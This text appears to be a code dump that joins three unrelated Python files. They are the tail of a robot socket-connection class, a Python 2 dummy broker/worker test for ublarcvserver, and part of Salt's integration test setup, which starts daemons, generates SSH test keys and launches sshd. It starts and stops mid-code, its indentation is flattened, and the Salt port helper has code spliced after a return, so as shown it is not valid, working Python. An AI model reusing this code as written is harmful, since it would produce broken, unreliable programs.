= False self.cmd_socket_recv_thread.start() print('Connection successful') return True def close(self): """ Close the connection """ self.is_shutdown = True self.cmd_socket_recv_thread.join() def start_video_recv(self): assert not self.is_shutdown, 'CONNECTION INVALID' if self.video_socket not in self.cmd_socket_list: self.video_socket.settimeout(5) try: self.video_socket.connect((self.robot_ip, RobotConnection.VIDEO_PORT)) except Exception as e: print('Connection failed, the reason is %s'%e) return False self.cmd_socket_list.append(self.video_socket) return True def stop_video_recv(self): if self.video_socket in self.cmd_socket_list: self.cmd_socket_list.remove(self.video_socket) return True def start_audio_recv(self): assert not self.is_shutdown, 'CONNECTION INVALID' if self.audio_socket not in self.cmd_socket_list: self.audio_socket.settimeout(5) try: self.audio_socket.connect((self.robot_ip, RobotConnection.AUDIO_PORT)) except Exception as e: print('Connection failed, the reason is %s'%e) return False self.cmd_socket_list.append(self.audio_socket) return True def stop_audio_recv(self): if self.audio_socket in self.cmd_socket_list: self.cmd_socket_list.remove(self.audio_socket) return True def send_data(self, msg): """ Send data to control port """ msg += ';' self.__send_data(self.ctrl_socket, msg) def recv_video_data(self, timeout=None, latest_data=False): """ Receive control data If optional arg 'timeout' is None (the default), block if necessary until get data from control port. If 'timeout' is a non-negative number, it blocks at most 'timeout' seconds and reuturn None if no data back from robot video port within the time. Otherwise, return the data immediately. If optional arg 'latest_data' is set to True, it will return the latest data, instead of the data in queue tail. """ return self.__recv_data(self.video_socket, timeout, latest_data) def recv_audio_data(self, timeout=None, latest_data=False): """ Receive control data If optional arg 'timeout' is None (the default), block if necessary until get data from control port. If 'timeout' is a non-negative number, it blocks at most 'timeout' seconds and reuturn None if no data back from robot video port within the time. Otherwise, return the data immediately. If optional arg 'latest_data' is set to True, it will return the latest data, instead of the data in queue tail. """ return self.__recv_data(self.audio_socket, timeout, latest_data) def recv_ctrl_data(self, timeout=None, latest_data=False): """ Receive control data If optional arg 'timeout' is None (the default), block if necessary until get data from control port. If 'timeout' is a non-negative number, it blocks at most 'timeout' seconds and reuturn None if no data back from robot control port within the time. Otherwise, return the data immediately. If optional arg 'latest_data' is set to True, it will return the latest data, instead of the data in queue tail. """ return self.__recv_data(self.ctrl_socket, timeout, latest_data) def recv_push_data(self, timeout=None, latest_data=False): """ Receive push data If optional arg 'timeout' is None (the default), block if necessary until get data from push port. If 'timeout' is a non-negative number, it blocks at most 'timeout' seconds and reuturn None if no data back from robot push port within the time. Otherwise, return the data immediately. If optional arg 'latest_data' is set to True, it will return the latest data, instead of the data in queue tail. """ return self.__recv_data(self.push_socket, timeout, latest_data) def recv_event_data(self, timeout=None, latest_data=False): """ Receive event data If optional arg 'timeout' is None (the default), block if necessary until get data from event port. If 'timeout' is a non-negative number, it blocks at most 'timeout' seconds and reuturn None if no data back from robot event port within the time. Otherwise, return the data immediately. If optional arg 'latest_data' is set to True, it will return the latest data, instead of the data in queue tail. """ return self.__recv_data(self.event_socket, timeout, latest_data) def __send_data(self, socket_obj, data): assert not self.is_shutdown, 'CONECTION INVALID' return socket_obj.send(data.encode('utf-8')) def __recv_data(self, socket_obj, timeout, latest_data): assert not self.is_shutdown, 'CONECTION INVALID' msg = None if latest_data: while self.cmd_socket_msg_queue[socket_obj].qsize() > 1: self.cmd_socket_msg_queue[socket_obj].get() try: msg = self.cmd_socket_msg_queue[socket_obj].get(timeout=timeout) except Exception as e: return None else: return msg def __socket_recv_task(self): while not self.is_shutdown: rlist, _, _ = select.select(self.cmd_socket_list, [], [], 2) for s in rlist: msg, addr = s.recvfrom(4096) if self.cmd_socket_msg_queue[s].full(): self.cmd_socket_msg_queue[s].get() self.cmd_socket_msg_queue[s].put(msg) for s in self.cmd_socket_list: try: s.shutdown(socket.SHUT_RDWR) except Exception as e: pass def test(): """ Test funciton Connect robot and query the version """ robot = RobotConnection('192.168.42.2') robot.open() robot.send_data('command') print('send data to robot : command') recv = robot.recv_ctrl_data(5) print('recv data from robot : %s'%recv) robot.send_data('version ?') print('send data to robot : version ?') recv = robot.recv_ctrl_data(5) print('recv data from robot : %s'%recv) robot.send_data('stream on') print('send data to robot : stream on') recv = robot.recv_ctrl_data(5) print('recv data from robot : %s'%recv) result = robot.start_video_recv() if result: stream_data = robot.recv_video_data(5) print('recv video data from robot %s'%stream_data) robot.stop_video_recv() robot.send_data('stream off') print('send data to robot : stream off') recv = robot.recv_ctrl_data(5) print('recv data from robot : %s'%recv) robot.send_data('audio on') print('send data to robot : audio on') recv = robot.recv_ctrl_data(5) print('recv data from robot : %s'%recv) result = robot.start_audio_recv() if result: stream_data = robot.recv_audio_data(5) print('recv audio data from robot %s'%stream_data) robot.stop_audio_recv() robot.send_data('audio off') print('send data to robot : audio off') recv = robot.recv_ctrl_data(5) print('recv data from robot : %s'%recv) robot.send_data('quit') print('send data to robot : quit') recv = robot.recv_ctrl_data(5) print('recv data from robot : %s'%recv) robot.close() if __name__ == '__main__': test()
py_dummy_test.py
import os,sys,time import logging from ublarcvserver import ublarcvserver from ublarcvserver import DummyPyWorker, Broker, Client from multiprocessing import Process """ This script is used to test the Majordomo classes. We implement a dummy setup where the client and worker just say hello to each other. Also servers as an example. We also setup the basic larcv client and worker, which pass larcv images back and forth. """ verbose = True def start_worker( endpoint, worker_verbose ): print "start worker on ",endpoint worker = DummyPyWorker(endpoint,verbose=True) worker.connect() print "worker started: ",worker.idname() #time.sleep(5) worker.run() #while True: #time.sleep(1) print "ending start-worker process" def start_broker(bindpoint): print "start broker" broker = Broker(bind=bindpoint) broker.run() print "broker closed" # endpoint: endpoint = "tcp://localhost:6005" bindpoint = "tcp://*:6005" logging.basicConfig(level=logging.DEBUG) # setup the broker #broker = ublarcvserver.MDBroker(bindpoint, verbose) #broker.start() pbroker = Process(target=start_broker,args=(bindpoint,)) pbroker.daemon = True pbroker.start() # setup the worker pworker = Process(target=start_worker,args=(endpoint,verbose)) pworker.daemon = True pworker.start() print "worker process created" # setup the client client = Client(endpoint) client.connect() print "client connected" for x in xrange(5): print "REQUEST %d"%(x+1) client.send("dummy","hello world %d"%(x)) msg = client.recv_all_as_list() print "reply from worker: ",msg time.sleep(2) print "[ENTER] to end" raw_input()
__init__.py
# -*- coding: utf-8 -*- ''' Set up the Salt integration test suite ''' # Import Python libs from __future__ import absolute_import, print_function import os import re import sys import copy import json import time import stat import errno import signal import shutil import pprint import atexit import socket import logging import tempfile import threading import subprocess import multiprocessing from datetime import datetime, timedelta try: import pwd except ImportError: pass # Import salt tests support dirs from tests.support.paths import * # pylint: disable=wildcard-import from tests.support.processes import * # pylint: disable=wildcard-import from tests.support.unit import TestCase from tests.support.case import ShellTestCase from tests.support.parser import PNUM, print_header, SaltTestcaseParser from tests.support.helpers import requires_sshd_server, RedirectStdStreams from tests.support.paths import ScriptPathMixin from tests.support.mixins import CheckShellBinaryNameAndVersionMixin, ShellCaseCommonTestsMixin from tests.support.mixins import AdaptedConfigurationTestCaseMixin, SaltClientTestCaseMixin from tests.support.mixins import SaltMinionEventAssertsMixin, SaltReturnAssertsMixin from tests.support.runtests import RUNTIME_VARS # Import Salt libs import salt import salt.config import salt.minion import salt.runner import salt.output import salt.version import salt.utils import salt.utils.network import salt.utils.process import salt.log.setup as salt_log_setup from salt.ext import six from salt.utils.verify import verify_env from salt.utils.immutabletypes import freeze from salt.utils.nb_popen import NonBlockingPopen from salt.exceptions import SaltClientError try: from salt.utils.gitfs import HAS_GITPYTHON, HAS_PYGIT2 HAS_GITFS = HAS_GITPYTHON or HAS_PYGIT2 except ImportError: HAS_GITFS = False try: import salt.master except ImportError: # Not required for raet tests pass # Import 3rd-party libs import yaml import msgpack import salt.ext.six as six from salt.ext.six.moves import cStringIO try: import salt.ext.six.moves.socketserver as socketserver except ImportError: import socketserver from tornado import gen from tornado import ioloop # Import salt tests support libs from tests.support.processes import SaltMaster, SaltMinion, SaltSyndic log = logging.getLogger(__name__) _RUNTESTS_PORTS = {} def get_unused_localhost_port(): ''' Return a random unused port on localhost ''' usock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM) usock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) usock.bind(('127.0.0.1', 0)) port = usock.getsockname()[1] if port in (54505, 54506, 64505, 64506, 64510, 64511, 64520, 64521): # These ports are hardcoded in the test configuration port = get_unused_localhost_port() usock.close() return port DARWIN = True if sys.platform.startswith('darwin') else False BSD = True if 'bsd' in sys.platform else False if DARWIN and port in _RUNTESTS_PORTS: port = get_unused_localhost_port() usock.close() return port _RUNTESTS_PORTS[port] = usock if DARWIN or BSD: usock.close() return port def close_open_sockets(sockets_dict): for port in list(sockets_dict): sock = sockets_dict.pop(port) sock.close() atexit.register(close_open_sockets, _RUNTESTS_PORTS) SALT_LOG_PORT = get_unused_localhost_port() class ThreadingMixIn(socketserver.ThreadingMixIn): daemon_threads = True class ThreadedSocketServer(ThreadingMixIn, socketserver.TCPServer): allow_reuse_address = True def server_activate(self): self.shutting_down = threading.Event() socketserver.TCPServer.server_activate(self) #super(ThreadedSocketServer, self).server_activate() def server_close(self): if hasattr(self, 'shutting_down'): self.shutting_down.set() socketserver.TCPServer.server_close(self) #super(ThreadedSocketServer, self).server_close() class SocketServerRequestHandler(socketserver.StreamRequestHandler): def handle(self): unpacker = msgpack.Unpacker(encoding='utf-8') while not self.server.shutting_down.is_set(): try: wire_bytes = self.request.recv(1024) if not wire_bytes: break unpacker.feed(wire_bytes) for record_dict in unpacker: record = logging.makeLogRecord(record_dict) logger = logging.getLogger(record.name) logger.handle(record) except (EOFError, KeyboardInterrupt, SystemExit): break except socket.error as exc: try: if exc.errno == errno.WSAECONNRESET: # Connection reset on windows break except AttributeError: # We're not on windows pass log.exception(exc) except Exception as exc: log.exception(exc) class TestDaemon(object): ''' Set up the master and minion daemons, and run related cases ''' MINIONS_CONNECT_TIMEOUT = MINIONS_SYNC_TIMEOUT = 120 def __init__(self, parser): self.parser = parser self.colors = salt.utils.get_colors(self.parser.options.no_colors is False) if salt.utils.is_windows(): # There's no shell color support on windows... for key in self.colors: self.colors[key] = '' def __enter__(self): ''' Start a master and minion ''' # Setup the multiprocessing logging queue listener salt_log_setup.setup_multiprocessing_logging_listener( self.master_opts ) # Set up PATH to mockbin self._enter_mockbin() if not HAS_GITFS: sys.stdout.write( ' * {LIGHT_RED}No suitable provider for git_pillar is installed. Install\n' ' GitPython or Pygit2.{ENDC}\n'.format( **self.colors ) ) if self.parser.options.transport == 'zeromq': self.start_zeromq_daemons() elif self.parser.options.transport == 'raet': self.start_raet_daemons() elif self.parser.options.transport == 'tcp': self.start_tcp_daemons() self.minion_targets = set(['minion', 'sub_minion']) self.pre_setup_minions() self.setup_minions() if getattr(self.parser.options, 'ssh', False): self.prep_ssh() if self.parser.options.sysinfo: try: print_header( '~~~~~~~ Versions Report ', inline=True, width=getattr(self.parser.options, 'output_columns', PNUM) ) except TypeError: print_header('~~~~~~~ Versions Report ', inline=True) print('\n'.join(salt.version.versions_report())) try: print_header( '~~~~~~~ Minion Grains Information ', inline=True, width=getattr(self.parser.options, 'output_columns', PNUM) ) except TypeError: print_header('~~~~~~~ Minion Grains Information ', inline=True) grains = self.client.cmd('minion', 'grains.items') minion_opts = self.minion_opts.copy() minion_opts['color'] = self.parser.options.no_colors is False salt.output.display_output(grains, 'grains', minion_opts) try: print_header( '=', sep='=', inline=True, width=getattr(self.parser.options, 'output_columns', PNUM) ) except TypeError: print_header('', sep='=', inline=True) try: return self finally: self.post_setup_minions() def start_daemon(self, cls, opts, start_fun): def start(cls, opts, start_fun): salt.utils.appendproctitle('{0}-{1}'.format(self.__class__.__name__, cls.__name__)) daemon = cls(opts) getattr(daemon, start_fun)() process = multiprocessing.Process(target=start, args=(cls, opts, start_fun)) process.start() return process def start_zeromq_daemons(self): ''' Fire up the daemons used for zeromq tests ''' if not salt.utils.network.ip_addrs(): sys.stdout.write( ' * {LIGHT_RED}Unable to list IPv4 addresses. Test suite startup will be\n' ' slower. Install iproute/ifconfig to fix this.{ENDC}\n'.format( **self.colors ) ) self.log_server = ThreadedSocketServer(('localhost', SALT_LOG_PORT), SocketServerRequestHandler) self.log_server_process = threading.Thread(target=self.log_server.serve_forever) self.log_server_process.daemon = True self.log_server_process.start() try: sys.stdout.write( ' * {LIGHT_YELLOW}Starting salt-master ... {ENDC}'.format(**self.colors) ) sys.stdout.flush() self.master_process = start_daemon( daemon_name='salt-master', daemon_id=self.master_opts['id'], daemon_log_prefix='salt-master/{}'.format(self.master_opts['id']), daemon_cli_script_name='master', daemon_config=self.master_opts, daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR, daemon_class=SaltMaster, bin_dir_path=SCRIPT_DIR, fail_hard=True, start_timeout=30) sys.stdout.write( '\r{0}\r'.format( ' ' * getattr(self.parser.options, 'output_columns', PNUM) ) ) sys.stdout.write( ' * {LIGHT_GREEN}Starting salt-master ... STARTED!\n{ENDC}'.format(**self.colors) ) sys.stdout.flush() except (RuntimeWarning, RuntimeError): sys.stdout.write( '\r{0}\r'.format( ' ' * getattr(self.parser.options, 'output_columns', PNUM) ) ) sys.stdout.write( ' * {LIGHT_RED}Starting salt-master ... FAILED!\n{ENDC}'.format(**self.colors) ) sys.stdout.flush() try: sys.stdout.write( ' * {LIGHT_YELLOW}Starting salt-minion ... {ENDC}'.format(**self.colors) ) sys.stdout.flush() self.minion_process = start_daemon( daemon_name='salt-minion', daemon_id=self.master_opts['id'], daemon_log_prefix='salt-minion/{}'.format(self.minion_opts['id']), daemon_cli_script_name='minion', daemon_config=self.minion_opts, daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR, daemon_class=SaltMinion, bin_dir_path=SCRIPT_DIR, fail_hard=True, start_timeout=30) sys.stdout.write( '\r{0}\r'.format( ' ' * getattr(self.parser.options, 'output_columns', PNUM) ) ) sys.stdout.write( ' * {LIGHT_GREEN}Starting salt-minion ... STARTED!\n{ENDC}'.format(**self.colors) ) sys.stdout.flush() except (RuntimeWarning, RuntimeError): sys.stdout.write( '\r{0}\r'.format( ' ' * getattr(self.parser.options, 'output_columns', PNUM) ) ) sys.stdout.write( ' * {LIGHT_RED}Starting salt-minion ... FAILED!\n{ENDC}'.format(**self.colors) ) sys.stdout.flush() try: sys.stdout.write( ' * {LIGHT_YELLOW}Starting sub salt-minion ... {ENDC}'.format(**self.colors) ) sys.stdout.flush() self.sub_minion_process = start_daemon( daemon_name='sub salt-minion', daemon_id=self.master_opts['id'], daemon_log_prefix='sub-salt-minion/{}'.format(self.sub_minion_opts['id']), daemon_cli_script_name='minion', daemon_config=self.sub_minion_opts, daemon_config_dir=RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, daemon_class=SaltMinion, bin_dir_path=SCRIPT_DIR, fail_hard=True, start_timeout=30) sys.stdout.write( '\r{0}\r'.format( ' ' * getattr(self.parser.options, 'output_columns', PNUM) ) ) sys.stdout.write( ' * {LIGHT_GREEN}Starting sub salt-minion ... STARTED!\n{ENDC}'.format(**self.colors) ) sys.stdout.flush() except (RuntimeWarning, RuntimeError): sys.stdout.write( '\r{0}\r'.format( ' ' * getattr(self.parser.options, 'output_columns', PNUM) ) ) sys.stdout.write( ' * {LIGHT_RED}Starting sub salt-minion ... FAILED!\n{ENDC}'.format(**self.colors) ) sys.stdout.flush() try: sys.stdout.write( ' * {LIGHT_YELLOW}Starting syndic salt-master ... {ENDC}'.format(**self.colors) ) sys.stdout.flush() self.smaster_process = start_daemon( daemon_name='salt-smaster', daemon_id=self.syndic_master_opts['id'], daemon_log_prefix='salt-smaster/{}'.format(self.syndic_master_opts['id']), daemon_cli_script_name='master', daemon_config=self.syndic_master_opts, daemon_config_dir=RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, daemon_class=SaltMaster, bin_dir_path=SCRIPT_DIR, fail_hard=True, start_timeout=30) sys.stdout.write( '\r{0}\r'.format( ' ' * getattr(self.parser.options, 'output_columns', PNUM) ) ) sys.stdout.write( ' * {LIGHT_GREEN}Starting syndic salt-master ... STARTED!\n{ENDC}'.format(**self.colors) ) sys.stdout.flush() except (RuntimeWarning, RuntimeError): sys.stdout.write( '\r{0}\r'.format( ' ' * getattr(self.parser.options, 'output_columns', PNUM) ) ) sys.stdout.write( ' * {LIGHT_RED}Starting syndic salt-master ... FAILED!\n{ENDC}'.format(**self.colors) ) sys.stdout.flush() try: sys.stdout.write( ' * {LIGHT_YELLOW}Starting salt-syndic ... {ENDC}'.format(**self.colors) ) sys.stdout.flush() self.syndic_process = start_daemon( daemon_name='salt-syndic', daemon_id=self.syndic_opts['id'], daemon_log_prefix='salt-syndic/{}'.format(self.syndic_opts['id']), daemon_cli_script_name='syndic', daemon_config=self.syndic_opts, daemon_config_dir=RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, daemon_class=SaltSyndic, bin_dir_path=SCRIPT_DIR, fail_hard=True, start_timeout=30) sys.stdout.write( '\r{0}\r'.format( ' ' * getattr(self.parser.options, 'output_columns', PNUM) ) ) sys.stdout.write( ' * {LIGHT_GREEN}Starting salt-syndic ... STARTED!\n{ENDC}'.format(**self.colors) ) sys.stdout.flush() except (RuntimeWarning, RuntimeError): sys.stdout.write( '\r{0}\r'.format( ' ' * getattr(self.parser.options, 'output_columns', PNUM) ) ) sys.stdout.write( ' * {LIGHT_RED}Starting salt-syndic ... FAILED!\n{ENDC}'.format(**self.colors) ) sys.stdout.flush() def start_raet_daemons(self): ''' Fire up the raet daemons! ''' import salt.daemons.flo self.master_process = self.start_daemon(salt.daemons.flo.IofloMaster, self.master_opts, 'start') self.minion_process = self.start_daemon(salt.daemons.flo.IofloMinion, self.minion_opts, 'tune_in') self.sub_minion_process = self.start_daemon(salt.daemons.flo.IofloMinion, self.sub_minion_opts, 'tune_in') # Wait for the daemons to all spin up time.sleep(5) # self.smaster_process = self.start_daemon(salt.daemons.flo.IofloMaster, # self.syndic_master_opts, # 'start') # no raet syndic daemon yet start_tcp_daemons = start_zeromq_daemons def prep_ssh(self): ''' Generate keys and start an ssh daemon on an alternate port ''' sys.stdout.write( ' * {LIGHT_GREEN}Starting {0} ... {ENDC}'.format( 'SSH server', **self.colors ) ) keygen = salt.utils.which('ssh-keygen') sshd = salt.utils.which('sshd') if not (keygen and sshd): print('WARNING: Could not initialize SSH subsystem. Tests for salt-ssh may break!') return if not os.path.exists(RUNTIME_VARS.TMP_CONF_DIR): os.makedirs(RUNTIME_VARS.TMP_CONF_DIR) # Generate client key pub_key_test_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'key_test.pub') priv_key_test_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'key_test') if os.path.exists(pub_key_test_file): os.remove(pub_key_test_file) if os.path.exists(priv_key_test_file): os.remove(priv_key_test_file) keygen_process = subprocess.Popen( [keygen, '-t', 'ecdsa', '-b', '521', '-C', '"$(whoami)@$(hostname)-$(date -I)"', '-f', 'key_test', '-P', ''], stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True, cwd=RUNTIME_VARS.TMP_CONF_DIR ) _, keygen_err = keygen_process.communicate() if keygen_err: print('ssh-keygen had errors: {0}'.format(salt.utils.to_str(keygen_err))) sshd_config_path = os.path.join(FILES, 'conf/_ssh/sshd_config') shutil.copy(sshd_config_path, RUNTIME_VARS.TMP_CONF_DIR) auth_key_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'key_test.pub') # Generate server key server_key_dir = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'server') if not os.path.exists(server_key_dir): os.makedirs(server_key_dir) server_dsa_priv_key_file = os.path.join(server_key_dir, 'ssh_host_dsa_key') server_dsa_pub_key_file = os.path.join(server_key_dir, 'ssh_host_dsa_key.pub') server_ecdsa_priv_key_file = os.path.join(server_key_dir, 'ssh_host_ecdsa_key') server_ecdsa_pub_key_file = os.path.join(server_key_dir, 'ssh_host_ecdsa_key.pub') server_ed25519_priv_key_file = os.path.join(server_key_dir, 'ssh_host_ed25519_key') server_ed25519_pub_key_file = os.path.join(server_key_dir, 'ssh_host.ed25519_key.pub') for server_key_file in (server_dsa_priv_key_file, server_dsa_pub_key_file, server_ecdsa_priv_key_file, server_ecdsa_pub_key_file, server_ed25519_priv_key_file, server_ed25519_pub_key_file): if os.path.exists(server_key_file): os.remove(server_key_file) keygen_process_dsa = subprocess.Popen( [keygen, '-t', 'dsa', '-b', '1024', '-C', '"$(whoami)@$(hostname)-$(date -I)"', '-f', 'ssh_host_dsa_key', '-P', ''], stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True, cwd=server_key_dir ) _, keygen_dsa_err = keygen_process_dsa.communicate() if keygen_dsa_err: print('ssh-keygen had errors: {0}'.format(salt.utils.to_str(keygen_dsa_err))) keygen_process_ecdsa = subprocess.Popen( [keygen, '-t', 'ecdsa', '-b', '521', '-C', '"$(whoami)@$(hostname)-$(date -I)"', '-f', 'ssh_host_ecdsa_key', '-P', ''], stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True, cwd=server_key_dir ) _, keygen_escda_err = keygen_process_ecdsa.communicate() if keygen_escda_err: print('ssh-keygen had errors: {0}'.format(salt.utils.to_str(keygen_escda_err))) keygen_process_ed25519 = subprocess.Popen( [keygen, '-t', 'ed25519', '-b', '521', '-C', '"$(whoami)@$(hostname)-$(date -I)"', '-f', 'ssh_host_ed25519_key', '-P', ''], stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True, cwd=server_key_dir ) _, keygen_ed25519_err = keygen_process_ed25519.communicate() if keygen_ed25519_err: print('ssh-keygen had errors: {0}'.format(salt.utils.to_str(keygen_ed25519_err))) with salt.utils.fopen(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'sshd_config'), 'a') as ssh_config: ssh_config.write('AuthorizedKeysFile {0}\n'.format(auth_key_file)) if not keygen_dsa_err: ssh_config.write('HostKey {0}\n'.format(server_dsa_priv_key_file)) if not keygen_escda_err: ssh_config.write('HostKey {0}\n'.format(server_ecdsa_priv_key_file)) if not keygen_ed25519_err: ssh_config.write('HostKey {0}\n'.format(server_ed25519_priv_key_file)) self.sshd_pidfile = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'sshd.pid') self.sshd_process = subprocess.Popen( [sshd, '-f', 'sshd_config', '-oPidFile={0}'.format(self.sshd_pidfile)], stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True, cwd=RUNTIME_VARS.TMP_CONF_DIR ) _, sshd_err = self.sshd_process.communicate() if sshd_err: print('sshd had errors on startup: {0}'.format(salt.utils.to_str(sshd_err))) else: os.environ['SSH_DAEMON_RUNNING'] = 'True' roster_path = os.path.join(FILES, 'conf/_ssh/roster') shutil.copy(roster_path, RUNTIME_VARS.TMP_CONF_DIR) with salt.utils.fopen(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'roster'), 'a') as roster: roster.write(' user: {0}\n'.format(RUNTIME_VARS.RUNNING_TESTS_USER)) roster.write(' priv: {0}/{1}'.format(RUNTIME_VARS.TMP_CONF_DIR, 'key_test')) sys.stdout.write( ' {LIGHT_GREEN}STARTED!\n{ENDC}'.format( **self.colors ) ) @classmethod def config(cls, role): ''' Return a configuration for a master/minion/syndic. Currently these roles are: * master * minion * syndic * syndic_master * sub_minion ''' return RUNTIME_VARS.RUNTIME_CONFIGS[role] @classmethod def config_location(cls): return RUNTIME_VARS.TMP_CONF_DIR @property def client(self): ''' Return a local client which will be used for example to ping and sync the test minions. This client is defined as a class attribute because its creation needs to be deferred to a latter stage. If created it on `__enter__` like it previously was, it would not receive the master events. ''' if 'runtime_client' not in RUNTIME_VARS.RUNTIME_CONFIGS: RUNTIME_VARS.RUNTIME_CONFIGS['runtime_client'] = salt.client.get_local_client( mopts=self.master_opts ) return RUNTIME_VARS.RUNTIME_CONFIGS['runtime_client'] @classmethod def transplant_configs(cls, transport='zeromq'): if os.path.isdir(RUNTIME_VARS.TMP_CONF_DIR): shutil.rmtree(RUNTIME_VARS.TMP_CONF_DIR) os.makedirs(RUNTIME_VARS.TMP_CONF_DIR) os.makedirs(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR) os.makedirs(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR) os.makedirs(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR) print(' * Transplanting configuration files to \'{0}\''.format(RUNTIME_VARS.TMP_CONF_DIR)) tests_known_hosts_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'salt_ssh_known_hosts') with salt.utils.fopen(tests_known_hosts_file, 'w') as known_hosts: known_hosts.write('') # This master connects to syndic_master via a syndic master_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'master')) master_opts['known_hosts_file'] = tests_known_hosts_file master_opts['cachedir'] = os.path.join(TMP, 'rootdir', 'cache') master_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER master_opts['config_dir'] = RUNTIME_VARS.TMP_CONF_DIR master_opts['root_dir'] = os.path.join(TMP, 'rootdir') master_opts['pki_dir'] = os.path.join(TMP, 'rootdir', 'pki', 'master') # This is the syndic for master # Let's start with a copy of the syndic master configuration syndic_opts = copy.deepcopy(master_opts) # Let's update with the syndic configuration syndic_opts.update(salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'syndic'))) syndic_opts['cachedir'] = os.path.join(TMP, 'rootdir', 'cache') syndic_opts['config_dir'] = RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR # This minion connects to master minion_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'minion')) minion_opts['cachedir'] = os.path.join(TMP, 'rootdir', 'cache') minion_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER minion_opts['config_dir'] = RUNTIME_VARS.TMP_CONF_DIR minion_opts['root_dir'] = os.path.join(TMP, 'rootdir') minion_opts['pki_dir'] = os.path.join(TMP, 'rootdir', 'pki') minion_opts['hosts.file'] = os.path.join(TMP, 'rootdir', 'hosts') minion_opts['aliases.file'] = os.path.join(TMP, 'rootdir', 'aliases') # This sub_minion also connects to master sub_minion_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'sub_minion')) sub_minion_opts['cachedir'] = os.path.join(TMP, 'rootdir-sub-minion', 'cache') sub_minion_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER sub_minion_opts['config_dir'] = RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR sub_minion_opts['root_dir'] = os.path.join(TMP, 'rootdir-sub-minion') sub_minion_opts['pki_dir'] = os.path.join(TMP, 'rootdir-sub-minion', 'pki', 'minion') sub_minion_opts['hosts.file'] = os.path.join(TMP, 'rootdir', 'hosts') sub_minion_opts['aliases.file'] = os.path.join(TMP, 'rootdir', 'aliases') # This is the master of masters syndic_master_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'syndic_master')) syndic_master_opts['cachedir'] = os.path.join(TMP, 'rootdir-syndic-master', 'cache') syndic_master_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER syndic_master_opts['config_dir'] = RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR syndic_master_opts['root_dir'] = os.path.join(TMP, 'rootdir-syndic-master') syndic_master_opts['pki_dir'] = os.path.join(TMP, 'rootdir-syndic-master', 'pki', 'master') if transport == 'raet': master_opts['transport'] = 'raet' master_opts['raet_port'] = 64506 minion_opts['transport'] = 'raet' minion_opts['raet_port'] = 64510 sub_minion_opts['transport'] = 'raet' sub_minion_opts['raet_port'] = 64520 # syndic_master_opts['transport'] = 'raet' if transport == 'tcp': master_opts['transport'] = 'tcp' minion_opts['transport'] = 'tcp' sub_minion_opts['transport'] = 'tcp' syndic_master_opts['transport'] = 'tcp' # Set up config options that require internal data master_opts['pillar_roots'] = syndic_master_opts['pillar_roots'] = { 'base': [os.path.join(FILES, 'pillar', 'base')] } master_opts['file_roots'] = syndic_master_opts['file_roots'] = { 'base': [ os.path.join(FILES, 'file', 'base'), # Let's support runtime created files that can be used like: # salt://my-temp-file.txt RUNTIME_VARS.TMP_STATE_TREE ], # Alternate root to test __env__ choices 'prod': [ os.path.join(FILES, 'file', 'prod'), RUNTIME_VARS.TMP_PRODENV_STATE_TREE ] } master_opts.setdefault('reactor', []).append( { 'salt/minion/*/start': [ os.path.join(FILES, 'reactor-sync-minion.sls') ], } ) for opts_dict in (master_opts, syndic_master_opts): if 'ext_pillar' not in opts_dict: opts_dict['ext_pillar'] = [] if salt.utils.is_windows(): opts_dict['ext_pillar'].append( {'cmd_yaml': 'type {0}'.format(os.path.join(FILES, 'ext.yaml'))}) else: opts_dict['ext_pillar'].append( {'cmd_yaml': 'cat {0}'.format(os.path.join(FILES, 'ext.yaml'))}) for opts_dict in (master_opts, syndic_master_opts): # We need to copy the extension modules into the new master root_dir or # it will be prefixed by it new_extension_modules_path = os.path.join(opts_dict['root_dir'], 'extension_modules') if not os.path.exists(new_extension_modules_path): shutil.copytree( os.path.join( INTEGRATION_TEST_DIR, 'files', 'extension_modules' ), new_extension_modules_path ) opts_dict['extension_modules'] = os.path.join(opts_dict['root_dir'], 'extension_modules') # Point the config values to the correct temporary paths for name in ('hosts', 'aliases'): optname = '{0}.file'.format(name) optname_path = os.path.join(TMP, name) master_opts[optname] = optname_path minion_opts[optname] = optname_path sub_minion_opts[optname] = optname_path syndic_opts[optname] = optname_path syndic_master_opts[optname] = optname_path master_opts['runtests_conn_check_port'] = get_unused_localhost_port() minion_opts['runtests_conn_check_port'] = get_unused_localhost_port() sub_minion_opts['runtests_conn_check_port'] = get_unused_localhost_port() syndic_opts['runtests_conn_check_port'] = get_unused_localhost_port() syndic_master_opts['runtests_conn_check_port'] = get_unused_localhost_port() for conf in 